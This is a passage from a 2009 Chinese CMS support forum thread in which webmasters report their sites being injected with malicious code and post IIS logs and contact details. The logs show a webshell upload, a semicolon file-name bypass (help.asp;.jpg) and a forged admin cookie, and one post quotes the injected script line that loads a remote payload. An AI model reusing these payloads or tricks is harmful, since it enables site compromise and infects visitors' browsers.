针对此次挂马事件官方已联合部分受害用户报警!请广大站长参与!-领先建站CMS提供服务商我们专注于CMS建站产品的研发

反对(0)

顶端

底部

7256504 当前离线

617 主题	1 广播	0 粉丝

级别:六年级

用户积分:6143 分
登录次数:538 次
注册时间:2007/3/15
最后登录:2018/9/7

7256504 发表于：2009/9/15 16:27:00 | 只看该作者查看该作者主题 32楼

以下是引用xcqs在2009-9-15 15:28:00的发言：

2009-09-14 14:58:16 W3SVC311 210.52.223.69 POST /UploadFiles/C00N.asp - 80 - 222.245.220.131 - 200 0 0 275
2009-09-14 14:58:17 W3SVC311 210.52.223.69 POST /KS_Editor/fckeditor/editor/css/images/help.asp;.jpg - 80 - 222.245.220.131 - 200 0 0 199
2009-09-14 14:58:38 W3SVC311 210.52.223.69 POST /Template/rss.asp nor=0&en=0&asp=0&dot=1 80 - 222.245.220.131 - 200 0 0 389

站名：秀衣阁

网址：www.xiuyige.com

QQ:64272435,xiuyige@qq.com

临时结觉方法：删除源程序，本地修改。临时放置HTML代码

IP222.245.220.131 和攻击我的是一样的。

反对(0)

顶端

底部

lijia_00 当前离线

1392 主题	0 广播	0 粉丝

级别:九年级

用户积分:1041 分
登录次数:27 次
注册时间:2009/6/10
最后登录:2013/9/5

lijia_00 发表于：2009/9/15 16:11:00 | 只看该作者查看该作者主题 33楼

做线上考试培训就选#科汛网校

我的就不报站名了在科讯做站不留名的原因就是怕被黑客找到攻击

不过我也是这次的受害者，两个站被攻击，用的虚拟空间拿不到日志！

李 QQ:258213149 （24小时在线）

反对(0)

顶端

底部

haxzh 当前离线

415 主题	0 广播	0 粉丝

级别:四年级

用户积分:3560 分
登录次数:223 次
注册时间:2008/9/2
最后登录:2011/3/14

haxzh 发表于：2009/9/15 15:43:00 | 只看该作者查看该作者主题 34楼

大家要提高警惕！现在科讯很红，不会是同行捣的鬼吧？请官方要严查严惩，决不手软！！！！！！！

反对(0)

顶端

底部

ko3c 当前离线

50 主题	0 广播	0 粉丝

级别:学前班

用户积分:421 分
登录次数:20 次
注册时间:2009/7/27
最后登录:2010/7/12

ko3c 发表于：2009/9/15 15:40:00 | 只看该作者查看该作者主题 35楼

做官网就用科汛智能建站系统!

昨晚被挂之后，今早修复，但今天白天又中。

IIS日志没有，

被挂之后多出代码如下。

document.writeln('<script language="JavaScript" src="http://www.icxxw.com/image%73/logo.%73wf" type="text/javascript" id="seraph6script9519" ><\/script>');
官方能给个解决方法吗

反对(0)

顶端

底部

做爱吧当前离线

126 主题	0 广播	0 粉丝

级别:一年级

用户积分:900 分
登录次数:18 次
注册时间:2007/6/17
最后登录:2009/10/30

做爱吧发表于：2009/9/15 16:44:00 | 只看该作者查看该作者主题 36楼

我就一个空站，已经挂马三次了。真不知道他们图啥！

又没有几个流量！

今天13：09第三次挂马了。

正好虚拟主机到期了，

呶呶的，不玩了。

有课程找生源就上科汛课堂街

反对(0)

顶端

底部

hi0533 当前离线

73 主题	0 广播	0 粉丝

级别:学前班

用户积分:781 分
登录次数:35 次
注册时间:2009/3/10
最后登录:2009/10/10

hi0533 发表于：2009/9/15 16:01:00 | 只看该作者查看该作者主题 37楼

1、IIS日志文件

2009-09-10 20:40:16 222.245.211.231 - W3SVC154 IIS514 96.0.100.151 80 POST /include/UpFileSave.asp |-|0|404_Not_Found 302 0 203 1512 375 HTTP/1.1 - ASPSESSIONIDQCBRCRBD=PPCOJMLBFOEBIJNCJLNIAPCM;+KS6wwwxxsemcom=PowerList=0&SuperTF=1&AdminName=admin&AdminPass=5c3a646ebc42cd13&RndPassword=xrd3qfw%2DonXGoDJlOjSX&SkinID=1&ModelPower=%2C%2C%2C%2C%2C%2C%2C%2C%2C&AdminLoginCode=2917&Password=469e80d32c0559f8&UserName=admin http://www.xxsem.com/include/UpFileSave.asp
2009-09-10 20:40:17 222.245.211.231 - W3SVC154 IIS514 96.0.100.151 80 GET /404.htm 404;http://www.xxsem.com/include/UpFileSave.asp 200 0 761 670 0 HTTP/1.1 - ASPSESSIONIDQCBRCRBD=PPCOJMLBFOEBIJNCJLNIAPCM;+KS6wwwxxsemcom=PowerList=0&SuperTF=1&AdminName=admin&AdminPass=5c3a646ebc42cd13&RndPassword=xrd3qfw%2DonXGoDJlOjSX&SkinID=1&ModelPower=%2C%2C%2C%2C%2C%2C%2C%2C%2C&AdminLoginCode=2917&Password=469e80d32c0559f8&UserName=admin http://www.xxsem.com/include/UpFileSave.asp
2009-09-10 20:40:20 222.245.211.231 - W3SVC154 IIS514 96.0.100.151 80 POST /include/UpFileSave.asp |-|0|404_Not_Found 302 0 203 1497 375 HTTP/1.1 - ASPSESSIONIDQCBRCRBD=PPCOJMLBFOEBIJNCJLNIAPCM;+KS6wwwxxsemcom=PowerList=0&SuperTF=1&AdminName=admin&AdminPass=5c3a646ebc42cd13&RndPassword=xrd3qfw%2DonXGoDJlOjSX&SkinID=1&ModelPower=%2C%2C%2C%2C%2C%2C%2C%2C%2C&AdminLoginCode=2917&Password=469e80d32c0559f8&UserName=admin http://www.xxsem.com/include/UpFileSave.asp
2009-09-10 20:40:21 222.245.211.231 - W3SVC154 IIS514 96.0.100.151 80 GET /404.htm 404;http://www.xxsem.com/include/UpFileSave.asp 200 0 761 670 0 HTTP/1.1 - ASPSESSIONIDQCBRCRBD=PPCOJMLBFOEBIJNCJLNIAPCM;+KS6wwwxxsemcom=PowerList=0&SuperTF=1&AdminName=admin&AdminPass=5c3a646ebc42cd13&RndPassword=xrd3qfw%2DonXGoDJlOjSX&SkinID=1&ModelPower=%2C%2C%2C%2C%2C%2C%2C%2C%2C&AdminLoginCode=2917&Password=469e80d32c0559f8&UserName=admin http://www.xxsem.com/include/UpFileSave.asp

2、你被挂的网站名称

上传程序后还没建站.....都没逃过

3、网站网址

http://www.xxsem.com/

4、你的联系人/联系电话/QQ等

邮箱 xxsem@qq.com

挂马IP 222.245.211.231

科汛商学院助您快速入门